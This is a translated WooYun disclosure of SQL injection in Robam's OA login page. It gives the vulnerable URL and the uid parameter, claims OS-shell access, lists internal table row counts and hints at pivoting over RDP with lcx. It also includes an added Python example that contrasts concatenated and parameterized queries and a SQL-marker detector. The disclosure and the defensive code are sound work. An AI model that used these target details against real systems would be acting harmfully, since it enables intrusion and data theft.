Vulnerability summary

Defect ID: wooyun-2015-0153320

Title: SQL injection in a ROBAM (老板电器) system (os-shell obtainable) leaks a large amount of corporate data

Vendor: Hangzhou Robam Appliances Co., Ltd. (杭州老板电器股份有限公司)

Author: ledoo

Submitted: 2015-11-10 16:27

Fix time: 2015-12-25 16:28

Public disclosure: 2015-12-25 16:28

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-11-10: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-12-25: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Professional kitchen appliances

Detailed description:

ROBAM OA system: http://oa.robam.com/oa/login.asp
Injection point: (POST) button1=%b5%c7%c2%bc&pwd=1&uid=F (button1 is the GBK-encoded label of the submit button); the uid parameter is not sanitized before it reaches the query.
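The report does not show the server-side code behind login.asp, only that the uid form field reaches the query unsanitized. The block below is an added example, not the report author's or the vendor's code: it reconstructs in Python (SQLite standing in for the SQL Server behind the OA) the two ways such a login query is typically written, shows why an unsanitized uid lets the input change the statement rather than merely fill it, and adds a small triage check over POST bodies in the shape the report gives. The table and column names, the sample account and the second request body are constructed assumptions.

```python
import sqlite3
from urllib.parse import parse_qs

# --- 1. the login query, written two ways ---------------------------------

def make_db():
    """In-memory stand-in for the OA user table (constructed sample data,
    not the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid TEXT PRIMARY KEY, pwd TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    conn.commit()
    return conn

def build_concat_sql(uid, pwd):
    """How a vulnerable login typically builds its query: the form values are
    spliced into the SQL text, so a quote inside uid ends the string literal
    and whatever follows is parsed as SQL, not as data."""
    return f"SELECT COUNT(*) FROM users WHERE uid='{uid}' AND pwd='{pwd}'"

def login_concat(conn, uid, pwd):
    """Vulnerable variant. Returns True/False, or None when the spliced
    query is no longer valid SQL (a stray quote in uid does exactly that)."""
    try:
        return conn.execute(build_concat_sql(uid, pwd)).fetchone()[0] > 0
    except sqlite3.Error:
        return None

def login_param(conn, uid, pwd):
    """Hardened variant: the values are bound as parameters, so the database
    always receives the same fixed statement and the input can only be data."""
    sql = "SELECT COUNT(*) FROM users WHERE uid=? AND pwd=?"
    return conn.execute(sql, (uid, pwd)).fetchone()[0] > 0

# --- 2. a triage check over request bodies --------------------------------

SQL_MARKERS = ("'", '"', ";", "--", "/*", "*/")

def parse_login_body(body):
    """Decode an application/x-www-form-urlencoded POST body the way the OA
    form sends it (GBK, as the %b5%c7%c2%bc button label indicates)."""
    return {k: v[0] for k, v in parse_qs(body, encoding="gbk").items()}

def suspicious_params(body):
    """Names of parameters whose value carries SQL metacharacters. Cheap
    triage for a WAF rule or for reviewing access logs of login.asp: it is
    a signal, not proof, and names with apostrophes will also hit."""
    params = parse_login_body(body)
    return sorted(k for k, v in params.items()
                  if any(m in v for m in SQL_MARKERS))

if __name__ == "__main__":
    db = make_db()
    print(login_concat(db, "alice", "s3cret"), login_param(db, "alice", "s3cret"))
    print(login_concat(db, "F'", "1"), login_param(db, "F'", "1"))
    # the body from the report, and a constructed variant with a quote in uid
    for body in ("button1=%b5%c7%c2%bc&pwd=1&uid=F",
                 "button1=%b5%c7%c2%bc&pwd=1&uid=F%27"):
        print(body, "->", suspicious_params(body))
```

The contrast worth noticing is the third call: with a single quote in uid the concatenated query stops being valid SQL (the database now sees attacker-shaped syntax), while the parameterized query simply reports no such user. The fix the report is asking for is the second form; input filtering on uid alone is a weaker substitute.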

1.png


27 databases:

db.png


os-shell obtainable:

shell.png


Proof of vulnerability:

A large amount of internal company data:
Database: robam

+---------------------------------------------+---------+
| Table | Entries |
+---------------------------------------------+---------+
| dbo.EB_RECALL_RESULT | 20641984 |
| dbo.WF_ACTIVE_HISTORY | 15304619 |
| dbo.EB_REPAIR_PROCESS | 10388513 |
| dbo.EB_REPAIR_PROCESS_BK | 6507983 |
| dbo.ST_STOCK_DETAIL_CENTER_PRODUCT | 6141723 |
| dbo.EB_CUSTOMER_PRODUCT | 5447744 |
| dbo.EB_GOODSBILL_DETAIL_HISTORY | 4263896 |
| dbo.EB_SELLBILL_DETAIL_HISTORY | 4262997 |
| dbo.ST_STOCK_BILL_CENTER_PRODUCT | 4159260 |
| dbo.ST_STOCK_DETAIL_CENTER_PRODUCT_BF | 4073056 |
| dbo.ST_APPLY_BILL_DETAIL_HISTORY | 3116113 |
| dbo.EB_GOODSBILL_DETAIL_HISTORY_BK | 2764312 |
| dbo.EB_REPAIR_HISTORY | 2671226 |
| dbo.ST_STOCK_BILL_CENTER_PRODUCT_BF | 2656724 |
| dbo.WF_STATE_HISTORY | 2460002 |
| dbo.EB_CUSTOMER | 2171553 |
| dbo.SYS_LOGIN_USERS | 2133212 |
| dbo.ST_DAILY_STOCK_CENTER_PRODUCT | 1971417 |
| dbo.EB_BALANCE_DETAIL | 1922419 |
| dbo.EB_GOODS_BILL_HISTORY | 1688643 |
| dbo.EB_REPAIR_HISTORY_BK | 1628772 |
| dbo.EB_SELL_BILL_HISTORY | 1572831 |
| dbo.ST_STOCK_DETAIL_CENTER_FITTINGS_NEW | 1550110 |
| dbo.EB_REPAIR_FAULTCODE | 1397925 |
| dbo.ST_STOCK_DETAIL_OTHER_PRODUCT | 1295683 |
| dbo.EB_BALANCE_DETAIL_BK | 1105139 |
| dbo.EB_GOODS_BILL_HISTORY_BK | 1086769 |
| dbo.EB_RECALL_HISTORY | 894542 |
| dbo.ST_STOCK_BILL_OTHER_PRODUCT | 865518 |
| dbo.ST_STOCK_DETAIL_WORKER_FITTINGS_NEW | 857202 |
| dbo.ST_DAILY_STOCK_OTHER_PRODUCT | 853046 |
| dbo.ST_DAILY_STOCK_CENTER_FITTINGS_NEW | 807257 |
| dbo.EB_REPAIR_FITTINGS | 784124 |
| dbo.ST_STOCK_BILL_CENTER_FITTINGS_NEW | 741384 |
| dbo.ST_APPLY_BILL_HISTORY | 691997 |
| dbo.ST_STOCK_DETAIL_SHOP_PRODUCT | 590716 |
| dbo.ST_STOCK_DETAIL_CENTER_FITTINGS_OLD | 511680 |
| dbo.EB_REPAIR_FITTINGS_TEMP | 469633 |
| dbo.ST_STOCK_DETAIL_WORKER_FITTINGS_OLD | 459449 |
| dbo.ST_STOCK_DETAIL_SHOP_PRODUCT_BF | 447865 |
| dbo.ST_STOCK_BILL_WORKER_FITTINGS_NEW | 447853 |
| dbo.ST_STOCK_BILL_WORKER_FITTINGS_OLD | 439128 |
| dbo.ST_STOCK_BILL_CENTER_FITTINGS_OLD | 379192 |
| dbo.ST_STOCK_DETAIL_CHANNEL_PRODUCT | 365679 |
| dbo.ST_APPLY_DETAIL_SHOWPIECE_HISTORY | 341018 |
| dbo.ST_STOCK_BILL_SHOP_PRODUCT | 325635 |
| dbo.ST_STOCK_DETAIL_HEAD_FITTINGS_NEW | 325029 |
| dbo.ST_DAILY_STOCK_SHOP_PRODUCT | 297876 |
| dbo.ST_PACKAGE_DETAIL | 281080 |
| dbo.WF_ACTIVE | 280034 |
| dbo.ST_SEND_BILL_DETAIL_HISTORY | 279288 |
| dbo.ST_DAILY_STOCK_CHANNEL_PRODUCT | 266890 |
| dbo.ST_RETURN_DETAIL_SHOWPIECE_HISTORY | 262061 |
| dbo.EB_SERVICE_DETAIL | 260659 |
| dbo.EB_SELLBILL_DETAIL | 246657 |
| dbo.WF_ACTIVE_BK | 246640 |
| dbo.EB_REPAIR_FITTINGS_DETAIL | 239402 |
| dbo.ST_STOCK_BILL_SHOP_PRODUCT_BF | 231832 |
| dbo.ST_DAILY_STOCK_HEAD_FITTINGS_NEW | 230008 |
| dbo.ST_DAILY_STOCK_CENTER_FITTINGS_OLD | 228593 |
| dbo.EB_CUSTOMER_FITTINGS | 193663 |
| dbo.ST_MONEY_BILL_WORKER | 168248 |
| dbo.ST_STOCK_DETAIL_SHOP_FITTINGS_NEW | 157316 |
| dbo.EB_CUSTOMER_VIP | 139003 |
| dbo.EB_REPAIR | 112740 |
| dbo.ST_MONEY_BILL_WORKER_BAK | 111497 |
| dbo.ST_STOCK_BILL_CHANNEL_PRODUCT | 110340 |
| dbo.TABLE89 | 106284 |
| dbo.ST_STOCK_DETAIL_HEAD_FITTINGS_OLD | 102738 |
| dbo.ST_DAILY_STOCK_SHOP_FITTINGS_NEW | 94899 |
| dbo.ST_RETURN_BILL_SHOWPIECE_HISTORY | 89161 |
| dbo.ST_STOCK_BILL_SHOP_FITTINGS_NEW | 83769 |
| dbo.ST_APPLY_BILL_SHOWPIECE_HISTORY | 83203 |
| dbo.WF_APPROVE_HISTORY | 77426 |
| dbo.ST_STOCK_TRACK_CHANNEL_PRODUCT | 77156 |
| dbo.EB_SELL_BILL | 75864 |
| dbo.ST_STOCK_TRACK_WORKER_FITTINGS_OLD | 68195 |
| dbo.EB_REPAIR_FITTINGS_BK | 61940 |
| dbo.ST_STOCK_DETAIL_SHOP_FITTINGS_OLD | 59814 |
| dbo.EB_REPAIR_NOCALL | 58181 |
| dbo.EB_GOODSBILL_DETAIL | 54096 |
| dbo.ST_STOCK_BILL_SHOP_FITTINGS_OLD | 47382 |
| dbo.ST_STOCK_TRACK_CENTER_FITTINGS_NEW | 44645 |
| dbo.ST_STOCK_TRACK_OTHER_PRODUCT | 43526 |
| dbo.ST_STOCK_BILL_HEAD_FITTINGS_NEW | 34841 |
| dbo.ST_DAILY_STOCK_SHOP_FITTINGS_OLD | 34703 |
| dbo.ST_STOCK_TRACK_CENTER_PRODUCT | 32642 |
| dbo.ST_DAILY_STOCK_HEAD_FITTINGS_OLD | 32359 |
| dbo.ST_MONEY_BILL | 29214 |
| dbo.ST_SEND_BILL_HISTORY | 24706 |
| dbo.WF_STATE | 23913 |
| dbo.EB_CHANGESTYLE_DETAIL | 23897 |
| dbo.EB_APPEAL_PROCESS | 23762 |
| dbo.WF_STATE_BK | 23144 |
| dbo.ST_PACKAGE | 22869 |
| dbo.EB_GOODS_BILL | 21874 |
| dbo.EB_GAS_NEW_DETAIL | 21326 |
| dbo.EB_GAS_OLD_DETAIL | 21295 |
| dbo.EB_CHANNEL_SELLBILL_DETAIL | 17701 |
| dbo.EB_GAS_CHANGE | 17351 |
| dbo.EB_CHANNEL_SELLBILL_DETAIL_HISTORY | 16737 |
| dbo.SYS_PART_SUB_FUNC | 13198 |
| dbo.SYS_ORGANIZATION | 12753 |
| dbo.UR_USERS_PART | 11185 |
| dbo.SYS_PART_FUNC | 11073 |
| dbo.SYS_ORGANIZATION_BK_100613 | 10424 |
| dbo.EB_CHANNEL_SELL_BILL_HISTORY | 9374 |
| dbo.SYS_MESSAGE_PERSON | 9215 |
| dbo.EB_MARKET | 8555 |
| dbo.EB_CHANGE_STYLE | 8098 |
| dbo.ST_APPLY_BILL_DETAIL | 7956 |
| dbo.ST_STOCK_TRACK_WORKER_FITTINGS_NEW | 7589 |
| dbo.EB_CHANNEL_SELL_BILL | 7218 |
| dbo.ST_STOCK_TRACK_SHOP_FITTINGS_NEW | 7142 |
| dbo.SYS_MESSAGE | 6708 |
| dbo.UR_USERS | 6647 |
| dbo.ST_APPLY_DISREPAIR_HISTORY | 6505 |
| dbo.EB_DELRP_LOG | 5831 |
| dbo.CD_SX_BAK | 5815 |
| dbo.SYS_FITTINGS | 5569 |
| dbo.EB_APPEAL | 5540 |
| dbo.ST_STOCK_TRACK_CENTER_FITTINGS_NEW_0616 | 5463 |
| dbo.EB_SHOP_HUMAN | 4740 |
| dbo.ST_STOCK_TRACK_HEAD_FITTINGS_NEW | 4718 |
| dbo.EB_CONSULTING | 4674 |
| dbo.EB_RECALL | 4641 |
| dbo.EB_CHANNEL | 4554 |
| dbo.CD_SX | 4531 |
| dbo.ST_STOCK_TRACK_HEAD_FITTINGS_OLD | 4509 |
| dbo.EB_BROWER | 4314 |
| dbo.EB_RECALL_CREATE | 3980 |
| dbo.EB_PRICE_DETAIL | 3974 |
| dbo.ST_STOCK_TRACK_SHOP_PRODUCT | 3853 |
| dbo.SYS_SERVICE_LOG | 3632 |
| dbo.ST_STOCK_TRACK_CENTER_FITTINGS_OLD | 3064 |
| dbo.ST_STOCK_BILL_HEAD_FITTINGS_OLD | 2592 |
| dbo.ST_MONEY_LIMIT_WORKER | 2085 |
| dbo.ST_SEND_BILL_DETAIL | 1893 |
| dbo.EB_OTHERS | 1856 |
| dbo.ST_MONEY_LIMIT_WORKER_BAK | 1708 |
| dbo.SYS_ORGANIZATION_BK2 | 1678 |
| dbo.SYS_ORGANIZATION_BK | 1657 |
| dbo.SYS_ORGANIZATION_LEON | 1650 |
| dbo.EB_REPAIR_DISCALL | 1643 |
| dbo.EB_BALANCE | 1603 |
| dbo.SYS_BOARD_ORG | 1143 |
| dbo.ST_APPLY_BILL | 1118 |
| dbo.UR_USERS_BK_100613 | 1100 |
| dbo.EB_SHOP | 1089 |
| dbo.EB_MARKET_BK | 1024 |
| dbo.SYS_PRODUCT | 900 |
| dbo.WF_STEP_SETTING | 801 |
| dbo.SYS_FITTINGS_SAFE_NUM | 730 |
| dbo.ST_RETURN_DETAIL_SHOWPIECE | 719 |
| dbo.SYS_SUB_FUNC | 699 |
| dbo.EB_REPAIR_NONUM | 602 |
| dbo.ST_APPLY_DETAIL_SHOWPIECE | 585 |
| dbo.EB_GOODS_CHANGE | 545 |
| dbo.RTS_REPORT_DETAIL_CONDITION | 510 |
| dbo.SMS_MESSAGE_LOG | 479 |
| dbo.ST_STOCK_TRACK_SHOP_FITTINGS_OLD | 474 |
| dbo.RTS_REPORT_DETAIL_PART | 462 |
| dbo.SYS_FAULT_CODE | 443 |
| dbo.EB_WORKERGROUP | 404 |
| dbo.EB_CHANNEL_BK | 358 |
| dbo.CD_TELAREA | 346 |
| dbo.SYS_FUNCTION | 304 |
| dbo.UR_PART | 264 |
| dbo.ST_RETURN_BILL_SHOWPIECE | 223 |
| dbo.WF_STEP_RELATIONSHIP | 203 |
| dbo.WF_STEP | 193 |
| dbo.WF_STEP_GRAPHIC | 193 |
| dbo.ID_CODEID | 189 |
| dbo.ST_APPLY_BILL_SHOWPIECE | 182 |
| dbo.EB_QNAIRE_ITEM | 179 |
| dbo.ST_SEND_BILL | 174 |
| dbo.EB_KNOWLEDGE_ARTICLE | 171 |
| dbo.WF_FUNCTION_SETTING | 136 |
| dbo.SYS_MESSAGE_GROUP | 104 |
| dbo.ST_MONEY_LIMIT | 92 |
| dbo.ST_TEMP_TRACK_CENTER_FITTINGS_NEW | 81 |
| dbo.ORG_ID_FLOWID | 78 |
| dbo.EB_QNAIRE_QUESTION | 75 |
| dbo.RTS_REPORT_SETTING | 75 |
| dbo.SYS_ORG_GROUP_DETAIL | 75 |
| dbo.RTS_REPORT_CONDITION | 74 |
| dbo.CD_BILL_TYPE | 68 |
| dbo.SMS_MESSAGE_SEND | 64 |
| dbo.CD_SX_TO | 60 |
| dbo.SYS_USER_GROUP_MEMBER | 46 |
| dbo.SMS_SendMessage | 36 |
| dbo.SYS_CATEGORY | 32 |
| dbo.EB_QUESTION_TYPE | 31 |
| dbo.WF_WORKFLOW_MODEL | 28 |
| dbo.EB_BALANCE_DETAIL_OTHER | 27 |
| dbo.EB_FEE_POLICY_DETAIL | 27 |
| dbo.WF_OPERATION_FUNCTION | 27 |
| dbo.CD_YEAR | 26 |
| dbo.EB_KNOWLEDGE_CATEGORY | 26 |
| dbo.CD_SEND_TYPE | 23 |
| dbo.CD_MESSAGESEND_STATUS | 22 |
| dbo.ID_FLOWID | 21 |
| dbo.SMS_MESSAGE_CONDITION | 21 |
| dbo.CD_APPEAL_TYPE | 18 |
| dbo.SYS_BOARD | 18 |
| dbo.CD_OUT_SUBJECT_CENTER_PRODUCT | 17 |
| dbo.SMS_MESSAGE_EMPLOYEEADD | 17 |
| dbo.SMS_MESSAGE_TASK | 17 |
| dbo.SYS_BOARD_GROUP | 17 |
| dbo.CD_OUT_SUBJECT_OTHER_PRODUCT | 16 |
| dbo.CD_OUT_SUBJECT_SHOP_PRODUCT | 16 |
| dbo.CD_REPAIR_METHOD | 16 |
| dbo.CD_OUT_SUBJECT_CENTER_FITTINGS_NEW | 15 |
| dbo.CD_IN_SUBJECT_CENTER_PRODUCT | 14 |
| dbo.EB_QNAIRE_TEMPLATE | 14 |
| dbo.SMS_MESSAGE_TEMPLATE | 14 |
| dbo.SMS_ReceiveMessage | 14 |
| dbo.ST_STOCK_TABLE_NAME | 14 |
| dbo.EB_SELLBILL_DETAIL_SELLER | 13 |
| dbo.CD_IN_SUBJECT_OTHER_PRODUCT | 12 |
| dbo.CD_IN_SUBJECT_SHOP_PRODUCT | 12 |
| dbo.CD_MONTH | 12 |
| dbo.SMS_MESSAGE_EMPLOYEEADD_GROUP_DETAIL | 12 |
| dbo.CD_EDUCATION | 11 |
| dbo.CD_OUT_SUBJECT_HEAD_FITTINGS_NEW | 11 |
| dbo.CD_PRODUCT_CUSTOMER | 11 |
| dbo.WF_CD_ACTIVE_STATUS | 11 |
| dbo.ZQ_CUSTOMER | 11 |
| dbo.CD_ORG_PRICE | 10 |
| dbo.CD_IN_SUBJECT_CENTER_FITTINGS_NEW | 9 |
| dbo.CD_IN_SUBJECT_HEAD_FITTINGS_NEW | 9 |
| dbo.CD_REPAIR_STATUS | 9 |
| dbo.RTS_CD_REPORT_GROUP | 9 |
| dbo.CD_OUT_SUBJECT_SHOP_FITTINGS_NEW | 8 |
| dbo.EB_SALES_INFO | 8 |
| dbo.EB_SELLER | 8 |
| dbo.SMS_ISR | 8 |
| dbo.ST_APPLY_DISREPAIR | 8 |
| dbo.CD_APPLY_BILL_STATUS | 7 |
| dbo.CD_IN_SUBJECT_HEAD_FITTINGS_OLD | 7 |
| dbo.CD_OUT_SUBJECT_PRODUCT | 7 |
| dbo.SMS_MESSAGE_USERHIDE | 7 |
| dbo.CD_CONSULT_TYPE | 6 |
| dbo.CD_IN_SUBJECT_CENTER_FITTINGS_OLD | 6 |
| dbo.CD_ORG_LEVEL | 6 |
| dbo.CD_ORG_PRODUCT_PRICE | 6 |
| dbo.CD_REPAIR_TYPE | 6 |
| dbo.CD_WF_CHANGE | 6 |
| dbo.CD_YYMM | 6 |
| dbo.CODE_TABLE_LIST | 6 |
| dbo.EB_PRODUCT_USER_DETAIL | 6 |
| dbo.CD_BUY_REASON | 5 |
| dbo.CD_COLORS | 5 |
| dbo.CD_CUSTOMER_FEEL | 5 |
| dbo.CD_IN_SUBJECT_PRODUCT | 5 |
| dbo.CD_IN_SUBJECT_SHOP_FITTINGS_NEW | 5 |
| dbo.CD_IN_SUBJECT_SHOP_FITTINGS_OLD | 5 |
| dbo.CD_OUT_SUBJECT_CENTER_FITTINGS_OLD | 5 |
| dbo.CD_OUT_SUBJECT_HEAD_FITTINGS_OLD | 5 |
| dbo.CD_QUESTION_TYPE | 5 |
| dbo.CD_RECALL_TYPE | 5 |
| dbo.CD_REPAIR_FEE_TYPE | 5 |
| dbo.EB_CUSTOMER_FEEL | 5 |
| dbo.RTS_CD_FIELD_EDIT_TYPE | 5 |
| dbo.WF_CD_WORKFLOW_STATUS | 5 |
| dbo.CD_ADVERSARY | 4 |
| dbo.CD_APPEAL_LEVEL | 4 |
| dbo.CD_APPEAL_SOURCE | 4 |
| dbo.CD_APPEAL_STATUS | 4 |
| dbo.CD_BALANCE_STATUS | 4 |
| dbo.CD_BOOK_TIME | 4 |
| dbo.CD_CUS_JOB | 4 |
| dbo.CD_INVOICE_LEVEL | 4 |
| dbo.CD_MEMBER_TYPE | 4 |
| dbo.CD_OTHERS_TYPE | 4 |
| dbo.CD_PRODUCT_TYPE | 4 |
| dbo.CD_PROMOTION | 4 |
| dbo.CD_RECALL_FACT | 4 |
| dbo.CD_SELLPRO_STATUS | 4 |
| dbo.CD_SEND_INFO | 4 |
| dbo.CD_STOCK_PRODUCT_ATTRIBUTE | 4 |
| dbo.SYS_RECALL_SETUP | 4 |
| dbo.WF_CD_ORG_LEVEL | 4 |
| dbo.CD_ADV_TYPE | 3 |
| dbo.CD_COUNT_UNIT | 3 |
| dbo.CD_CUS_REGION | 3 |
| dbo.CD_CUS_SATIS | 3 |
| dbo.CD_CUSPROD_REPAIR | 3 |
| dbo.CD_FAULT_GRADE | 3 |
| dbo.CD_INSTALL_SITE | 3 |
| dbo.CD_INVOICE_TYPE | 3 |
| dbo.CD_ISLSF | 3 |
| dbo.CD_OUT_SUBJECT_CHANNEL_PRODUCT | 3 |
| dbo.CD_PACKAGE_STATUS | 3 |
| dbo.CD_POLICY | 3 |
| dbo.CD_PRESENT_DEPTH | 3 |
| dbo.CD_PRODUCT_LEVEL | 3 |
| dbo.CD_RECALL_STATE | 3 |
| dbo.CD_RECALL_STATUS | 3 |
| dbo.CD_REPAIR_MODE | 3 |
| dbo.CD_REPAIR_PRI | 3 |
| dbo.CD_REPAIR_URGENT | 3 |
| dbo.CD_SELLBILL_STATUS | 3 |
| dbo.CD_SERVER_MODE | 3 |
| dbo.EB_FEE_POLICY | 3 |
| dbo.SYS_FITTINGS_PLACE | 3 |
| dbo.SYS_USER_GROUP | 3 |
| dbo.temp | 3 |
| dbo.WF_CD_FUNCTION_TYPE | 3 |
| dbo.WF_CD_STEP_TYPE | 3 |
| dbo.WF_USER_DELEGATE | 3 |
| dbo.CD_APPROVE | 2 |
| dbo.CD_CONSULT_STATUS | 2 |
| dbo.CD_CUS_TYPE | 2 |
| dbo.CD_FAULT_TYPE | 2 |
| dbo.CD_FEP_PAY_TYPE | 2 |
| dbo.CD_FEP_PAY_WAY | 2 |
| dbo.CD_FITTINGS_TYPE | 2 |
| dbo.CD_GOODS_WAY | 2 |
| dbo.CD_IN_SUBJECT_CHANNEL_PRODUCT | 2 |
| dbo.CD_MONEY_CHANGE_TYPE | 2 |
| dbo.CD_OUT_SUBJECT_SHOP_FITTINGS_OLD | 2 |
| dbo.CD_PART_TYPE | 2 |
| dbo.CD_PAY_STATUS | 2 |
| dbo.CD_PREMONEY_PLACE | 2 |
| dbo.CD_PRINT_STATE | 2 |
| dbo.CD_PROD_TYPE | 2 |
| dbo.CD_PRODUCE_TYPE | 2 |
| dbo.CD_PRODUCT_STATUS | 2 |
| dbo.CD_RECALL_MOD | 2 |
| dbo.CD_REPAIR_LEVEL | 2 |
| dbo.CD_REPAIR_SORT | 2 |
| dbo.CD_RPT_INOUT | 2 |
| dbo.CD_RPT_NEWOLD | 2 |
| dbo.CD_RPT_SUBJECT | 2 |
| dbo.CD_SELLPRODUCT_TYPE | 2 |
| dbo.CD_SEX | 2 |
| dbo.CD_USE_STATUS | 2 |
| dbo.CD_YESNO | 2 |
| dbo.EB_SELL_BILL_SELLER | 2 |
| dbo.ST_MONEY_BILL_PRODUCT | 2 |
| dbo.ST_MONEY_LIMIT_PRODUCT | 2 |
| dbo.WF_CD_OCCUPY_TYPE | 2 |
| dbo.WF_CD_USER_DELEGATE_STATUS | 2 |
| dbo.ZQ_CUSTOMER_PRODUCT | 2 |
| dbo.CD_IN_SUBJECT_WORKER_FITTINGS_NEW | 1 |
| dbo.CD_IN_SUBJECT_WORKER_FITTINGS_OLD | 1 |
| dbo.CD_OUT_SUBJECT_WORKER_FITTINGS_NEW | 1 |
| dbo.CD_OUT_SUBJECT_WORKER_FITTINGS_OLD | 1 |
| dbo.CD_RPTOTAL_CUS | 1 |
| dbo.CD_SERVICE_CONDITON | 1 |
| dbo.EB_FEE_TRANS | 1 |
| dbo.EB_GZ | 1 |
| dbo.EB_KNOWLEDGE_SEARCH | 1 |
| dbo.EB_MINPRICE_PRODUCT | 1 |
| dbo.EB_PBFEE_DETAIL | 1 |
| dbo.EB_PRODUCT_USER | 1 |
| dbo.SMS_MESSAGE_DISPATCH | 1 |
| dbo.SMS_Register | 1 |
| dbo.ST_STOCK_SETTING | 1 |
| dbo.SYS_ORG_GROUP | 1 |
+---------------------------------------------+---------+


Database: portal

+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| dbo.UserTrackerPath | 8560269 |
| dbo.UserTracker | 889885 |
| dbo.AnnouncementsView | 207526 |
| dbo.Permission_ | 60027 |
| dbo.Users_Permissions | 56106 |
| dbo.userdata2 | 29558 |
| dbo.UserData | 29307 |
| dbo.LayoutSet | 19617 |
| dbo.QuestionnaireAnswer | 17989 |
| dbo.Resource_ | 12333 |
| dbo.UserGroupRole | 10464 |
| dbo.Group_ | 9812 |
| dbo.Users_Roles | 9484 |
| dbo.Users_Groups | 9480 |
| dbo.Users_UserGroups | 4481 |
| dbo.AnnouncementsDelivery | 3543 |
| dbo.Contact_ | 2770 |
| dbo.User_ | 2769 |
| dbo.PortletPreferences | 2706 |
| dbo.temp_users | 2265 |
| dbo.TagsAsset | 2208 |
| dbo.User_bak | 2010 |
| dbo.user38 | 1851 |
| dbo.MyMenu | 1736 |
| dbo.Chat_Status | 1729 |
| dbo.BrowserTracker | 1722 |
| dbo.UNUser | 1665 |
| dbo.Groups_Permissions | 1547 |
| dbo.CalMapping | 1530 |
| dbo.MyProperties | 1468 |
| dbo.Image | 1426 |
| dbo.tmpuserid | 1228 |
| dbo.ResourceCode | 1183 |
| dbo.User__bak | 1183 |
| dbo.Phone | 826 |
| dbo.IGImage | 702 |
| dbo.Users_Orgs_bak | 695 |
| dbo.tmp_phone | 654 |
| dbo.Phone3 | 646 |
| dbo.Chat_Entry | 633 |
| dbo.CalEvent | 573 |
| dbo.Announcements | 540 |
| dbo.UserMenu | 533 |
| dbo.CalEvent_bak | 502 |
| dbo.DLFileRank | 419 |
| dbo.AnnouncementFile | 403 |
| dbo.Organization_ | 322 |
| dbo.Users_Orgs | 300 |
| dbo._sessioninfo | 282 |
| dbo.QuestionnaireReply | 279 |
| dbo.QuestionnaireChoice | 240 |
| dbo.QuestionnaireStat | 240 |
| dbo.Region | 236 |
| dbo.EventHistory | 231 |
| dbo.Country | 227 |
| dbo.Users_Orgs_0306 | 194 |
| dbo.ClassName_ | 174 |
| dbo.Phone2 | 173 |
| dbo.SocialActivity | 165 |
| dbo.tmporg | 142 |
| dbo.tmporg2 | 141 |
| dbo.Roles_Permissions | 115 |
| dbo.UserMap | 72 |
| dbo.UserMapPicture | 72 |
| dbo.ListType | 63 |
| dbo.QuestionnaireQuestion | 60 |
| dbo.EventHistoryView | 54 |
| dbo.Sidmapping | 27 |
| dbo.IGFolder | 23 |
| dbo.ForeignCompany | 20 |
| dbo.ForeignCompanyUser | 18 |
| dbo.DataMaskRule | 16 |
| dbo.EmailAddress | 16 |
| dbo.PersonalInfoCol | 16 |
| dbo.czguser | 15 |
| dbo.Layout | 13 |
| dbo.Counter | 12 |
| dbo.Role_ | 11 |
| dbo.OrgLabor | 10 |
| dbo.SysProperties | 9 |
| dbo.Label | 7 |
| dbo.Marquee | 7 |
| dbo.BookingSessionDevice | 6 |
| dbo.BookingSessionRoom | 6 |
| dbo.Message | 6 |
| dbo.CalEventFile | 5 |
| dbo.MsgEventFile | 5 |
| dbo.QUARTZ_LOCKS | 5 |
| dbo.UserGroup | 5 |
| dbo.MBDiscussion | 4 |
| dbo.MBMessage | 4 |
| dbo.MBThread | 4 |
| dbo.Address | 3 |
| dbo.AnnouncementType | 3 |
| dbo.DLFileEntry | 3 |
| dbo.ForeignCompanyMapping | 3 |
| dbo.PollsChoice | 3 |
| dbo.AnnouncementFileTemp | 2 |
| dbo.DLFolder | 2 |
| dbo.MBCategory | 2 |
| dbo.RatingsEntry | 2 |
| dbo.RatingsStats | 2 |
| dbo.UserMenuIcon | 2 |
| dbo.Account_ | 1 |
| dbo.BookingSessionRoomFile | 1 |
| dbo.Company | 1 |
| dbo.DscGroupCal | 1 |
| dbo.Label_Portlet | 1 |
| dbo.MBMailingList | 1 |
| dbo.PasswordPolicy | 1 |
| dbo.PollsQuestion | 1 |
| dbo.Questionnaire | 1 |
| dbo.QuestionnaireType | 1 |
| dbo.Release_ | 1 |
| dbo.ServiceComponent | 1 |
| dbo.SessionRoom | 1 |
+----------------------------+---------+


Forwarding port 3389 with lcx or a similar tool gives access to the intranet.

host.png

Fix recommendation:

Check.

Copyright notice: when reposting, please credit the source, ledoo@乌云 (WooYun)


Vulnerability response

Vendor response:

Vendor could not be contacted, or the vendor actively refused

Vulnerability Rank: 15 (WooYun rating)